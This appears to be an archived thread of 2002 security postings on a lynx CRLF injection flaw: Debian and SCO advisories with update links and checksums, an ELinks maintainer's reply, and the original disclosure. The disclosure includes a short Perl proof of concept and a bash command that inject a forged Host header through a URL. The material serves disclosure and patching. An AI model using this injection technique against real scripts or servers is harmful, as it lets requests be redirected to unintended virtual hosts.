[SECURITY] [DSA-210-1] lynx CRLF injection

[Wichert Akkerman]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-210-1   [EMAIL PROTECTED]
http://www.debian.org/security/ Wichert Akkerman
December 13, 2002
- 


Package: lynx, lynx-ssl
Problem type   : CRLF injection
Debian-specific: no

lynx (a text-only web browser) did not properly check for illegal
characters in all places, including processing of command line options,
which could be used to insert extra HTTP headers in a request.

For Debian GNU/Linux 2.2/potato this has been fixed in version 2.8.3-1.1
of the lynx package and version 2.8.3.1-1.1 of the lynx-ssl package.

For Debian GNU/Linux 3.0/woody this has been fixed in version 2.8.4.1b-3.2
of the lynx package and version 1:2.8.4.1b-3.1 of the lynx-ssl package.

- 

Obtaining updates:

  By hand:
wget URL
will fetch the file for you.
dpkg -i FILENAME.deb
will install the fetched file.

  With apt:
deb http://security.debian.org/ stable/updates main
added to /etc/apt/sources.list will provide security updates

Additional information can be found on the Debian security webpages
at http://www.debian.org/security/

- 


Debian GNU/Linux 2.2 alias potato
- -

  Potato was released for alpha, arm, i386, m68k, powerpc and sparc.


  Source archives:


http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.3.1.orig.tar.gz
  Size/MD5 checksum:  2058352 2ee38e4b05d587a787c33bff9085c098
http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.3.1-1.1.dsc
  Size/MD5 checksum: 1279 3eccb5692780db83f078013ff8796224
http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.3-1.1.dsc
  Size/MD5 checksum: 1229 2924513df600a7cc6b4d29987a325107
http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.3.orig.tar.gz
  Size/MD5 checksum:  2024975 0fc239287592e885231e4be2fb2cd755
http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.3-1.1.diff.gz
  Size/MD5 checksum:20091 507a328f301a1c37471a69e60df4479d

http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.3.1-1.1.diff.gz
  Size/MD5 checksum:   101630 59d4dfb527584001374bebdcc9760623

  alpha architecture (DEC Alpha)


http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.3.1-1.1_alpha.deb
  Size/MD5 checksum:  1165112 dce2288ab84eaac8851c657ab271f5cd
http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.3-1.1_alpha.deb
  Size/MD5 checksum:  1155516 775381bbf1c7c5f3177b17369969fda7

  arm architecture (ARM)


http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.3.1-1.1_arm.deb
  Size/MD5 checksum:  1018784 ba8d2ee2271ebb56216e4f9c67690f6a
http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.3-1.1_arm.deb
  Size/MD5 checksum:  1006492 85a7c675d239cce67e4d7076d69e8c48

  i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.3-1.1_i386.deb
  Size/MD5 checksum:   973310 9f591d8c7e97b1bd84da2f841397a75c

http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.3.1-1.1_i386.deb
  Size/MD5 checksum:   980678 ef6cf5f0e4a8781b14876639fafa78be

  m68k architecture (Motorola Mc680x0)

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.3-1.1_m68k.deb
  Size/MD5 checksum:   928930 b77c252b5da24613fd6b24ee7b8f09f5

http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.3.1-1.1_m68k.deb
  Size/MD5 checksum:   938162 e3b5992515dfb3f537ee9ece56a05083

  powerpc architecture (PowerPC)


http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.3.1-1.1_powerpc.deb
  Size/MD5 checksum:  1026988 3453040226d6fde9fb23ff8334d5e382
http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.3-1.1_powerpc.deb
  Size/MD5 checksum:  1015372 c2e0c1e1026f7fd2053d2c09cab90be1

  sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.3-1.1_sparc.deb
  Size/MD5 checksum:  1015696 3a207988cadc086720029abf6a227954

http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.3.1-1.1_sparc.deb
  Size/MD5 checksum:  1028208 bf6725e66a603d0652a6a987f737c64b


Debian GNU/Linux 3.0 alias woody
- 

  Woody was released for alpha, arm, hppa, i386, ia64, m68k, mips, mipsel,
  powerpc, s390 and sparc.

  Source archives:


http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b.orig.tar.gz
  Size/MD5 checksum:  2557510 053a10f76b871e3944c11c7776da7f7a

Security Update: [CSSA-2002-049.0] Linux: lynx CRLF injection vulnerability

[security]

To: [EMAIL PROTECTED] [EMAIL PROTECTED] 
[EMAIL PROTECTED] [EMAIL PROTECTED]


__

SCO Security Advisory

Subject:Linux: lynx CRLF injection vulnerability
Advisory number:CSSA-2002-049.0
Issue date: 2002 November 18
Cross reference:
__


1. Problem Description

If lynx is given a url with some special characters on
the command line, it will include faked headers in the HTTP
query. This feature can be used to force scripts (that use Lynx
for downloading files) to access the wrong site on a web server
with multiple virtual hosts.


2. Vulnerable Supported Versions

System  Package
--

OpenLinux 3.1.1 Server  prior to lynx-2.8.4-1.i386.rpm

OpenLinux 3.1.1 Workstation prior to lynx-2.8.4-1.i386.rpm

OpenLinux 3.1 Serverprior to lynx-2.8.4-1.i386.rpm

OpenLinux 3.1 Workstation   prior to lynx-2.8.4-1.i386.rpm


3. Solution

The proper solution is to install the latest packages. Many
customers find it easier to use the Caldera System Updater, called
cupdate (or kcupdate under the KDE environment), to update these
packages rather than downloading and installing them by hand.


4. OpenLinux 3.1.1 Server

4.1 Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-049.0/RPMS

4.2 Packages

86aa0c385c7b4789aa33fe57dc209490lynx-2.8.4-1.i386.rpm

4.3 Installation

rpm -Fvh lynx-2.8.4-1.i386.rpm

4.4 Source Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-049.0/SRPMS

4.5 Source Packages

2b48e8130471668d9562fc10a5969d02lynx-2.8.4-1.src.rpm


5. OpenLinux 3.1.1 Workstation

5.1 Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-049.0/RPMS

5.2 Packages

bd467354192cc42c87abb4be5650749flynx-2.8.4-1.i386.rpm

5.3 Installation

rpm -Fvh lynx-2.8.4-1.i386.rpm

5.4 Source Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-049.0/SRPMS

5.5 Source Packages

cf32748b277276e5f43a6f4111bb1ff2lynx-2.8.4-1.src.rpm


6. OpenLinux 3.1 Server

6.1 Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Server/CSSA-2002-049.0/RPMS

6.2 Packages

02bb0b77cf7f6014c6ad5a386e5bc763lynx-2.8.4-1.i386.rpm

6.3 Installation

rpm -Fvh lynx-2.8.4-1.i386.rpm

6.4 Source Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Server/CSSA-2002-049.0/SRPMS

6.5 Source Packages

61828e229e2794c46376c95354c8859clynx-2.8.4-1.src.rpm


7. OpenLinux 3.1 Workstation

7.1 Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Workstation/CSSA-2002-049.0/RPMS

7.2 Packages

d0b3580c93c3790d88eb0c4d18a75e58lynx-2.8.4-1.i386.rpm

7.3 Installation

rpm -Fvh lynx-2.8.4-1.i386.rpm

7.4 Source Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Workstation/CSSA-2002-049.0/SRPMS

7.5 Source Packages

2c321eabba1a1d8172893de42f58af59lynx-2.8.4-1.src.rpm


8. References

Specific references for this advisory:
none

SCO security resources:
http://www.sco.com/support/security/index.html

This security fix closes SCO incidents sr868660, fz525986,
erg712118.


9. Disclaimer

SCO is not responsible for the misuse of any of the information
we provide on this website and/or through our security
advisories. Our advisories are a service to our customers intended
to promote secure installation and use of SCO products.


10. Acknowledgements

SCO would like to thank Ulf Harnhammar for the discovery and
analysis of this vulnerability.

__



msg09960/pgp0.pgp
Description: PGP signature

Re: Lynx CRLF Injection, part two

[Petr Baudis]

Hello,

Dear diary, on Fri, Aug 23, 2002 at 11:09:21AM CEST, I got a letter,
where Alberto Devesa [EMAIL PROTECTED] told me, that...
 The same bug seems to affects to the links browser. I have tested it with the 
 0.96 version. Links is another console browser with extended capabilities not 
 supported by lynx like frames, colors and menus.

  yes, the same bug exists in Links and ELinks - Ulf contacted us both
maintainers, however I wasn't able to react fast enough due to the floods in
Czech Republic. Yesterday, I finally fixed the bug in ELinks-0.4pre and
released ELinks-0.4pre15 (we now actually encode even tab, cr and lf when
sending the URL to the server). All ELinks users are recommended to upgrade,
the new ELinks homepage is at http://elinks.or.cz/.

  Note that there's no fix for ELinks-0.3.2, as I don't consider this a
critical bug and ELinks-0.4.0 is expected to replace ELinks-0.3.2 in very near
future.

-- 
 
Petr Pasky Baudis
 
* ELinks maintainer* IPv6 guy (XS26 co-coordinator)
* IRCnet operator  * FreeCiv AI occassional hacker
.
Beeth Girls are like internet domain names, the ones I like are already taken.
honx Well, you can still get one from a strange country :-P
.
Public PGP key  geekcode  homepage: http://pasky.ji.cz/~pasky/

Lynx CRLF Injection

[Ulf Harnhammar]

Lynx CRLF Injection


PROGRAM: Lynx
VENDOR: Lynx-Dev List [EMAIL PROTECTED]
HOMEPAGE: http://lynx.browser.org/
VULNERABLE VERSIONS: 2.8.4rel.1, 2.8.5dev.8, 2.8.3rel.1, 2.8.2rel.1,
 possibly others
IMMUNE VERSIONS: 2.8.4rel.1 with all patches applied
PATCH: ftp://lynx.isc.org/lynx2.8.4/patches/lynx2.8.4rel.1c.patch
SEVERITY: medium


DESCRIPTION:

Lynx is a fully-featured World Wide Web (WWW) client for users
running cursor-addressable, character-cell display devices such
as vt100 terminals, vt100 emulators running on Windows 95/NT or
Macintoshes, or any other character-cell display.  It will display
Hypertext Markup Language (HTML) documents containing links to files
on the local system, as well as files on remote systems running
http, gopher, ftp, wais, nntp, finger, or cso/ph/qi servers, and
services accessible via logins to telnet, tn3270 or rlogin accounts.
Current versions of Lynx run on Unix, VMS, Windows95/NT, 386DOS
and OS/2 EMX.

(direct quote from the program's README file)

Lynx is published under the terms of the GNU General Public License.
It is a very common program (I personally have used it since 1995),
but this hole will only affect some of its users.


SUMMARY:

If you give Lynx a URL with some special characters on the command
line, it will include faked headers in the HTTP query. This way,
you can make scripts that use Lynx for downloading files access
the wrong site on a web server with multiple virtual hosts.


TECHNICAL DETAILS:

When a URL is given on the command line or in the WWW_HOME
environment variable, Lynx doesn't remove or encode dangerous
characters such as space, tab, CR and LF before constructing HTTP
queries. This means that an attacker can construct a URL that will
send arbitrary faked HTTP headers, by adding space + HTTP/1.0 +
CRLF + some headers + CRLF + CRLF after the normal URL. Lynx's own
HTTP headers are sent after the faked headers, but the web server
ignores them, as our CRLF + CRLF pair above indicates the end of
the headers.

This may cause some security problems. One scenario is when a
program starts Lynx, and the host part of the URL is supplied
by the program and the path by its user (something like lynx
http://www.site3.st/$path;, where the value of $path is defined by
the user). An attacker can make such a program access some other web
site than www.site3.st, if it's a virtual host on the same machine
as www.site3.st, by adding a Host: header as described above.

Relative links don't work in web pages that are fetched this way. If
there is a relative link like  a href=sunnanvind.htmlSunnan/a
and the user follows it, Lynx gets confused.

To get more information about this type of hole,
read my paper CRLF Injection, which is available at
http://cert.uni-stuttgart.de/archive/bugtraq/2002/05/msg00079.html


PERL EXPLOIT:

#!/usr/bin/perl --
# Ulf Harnhammar 2002
# example: ./exploit www.site1.st www.site2.st
# will show www.site2.st

die $0 hostone hosttwo\n if @ARGV != 2;

exec('lynx '.
 http://$ARGV[0]/ HTTP/1.0\012.
 Host: $ARGV[1]\012\012.
 '');


BASH COMMAND LINE EXPLOIT:

(This exploit assumes that www.site1.st and www.site2.st are virtual
hosts on the same machine. Lynx will show www.site2.st.)

[ulf@metaur ulf]$ lynx http://www.site1.st/ HTTP/1.0
Host: www.site2.st




COMMUNICATION WITH VENDOR:

The vendor was contacted on the 13th of August. Their patch was
released and announced on the Lynx-Dev list on the 18th.


// Ulf Harnhammar
[EMAIL PROTECTED]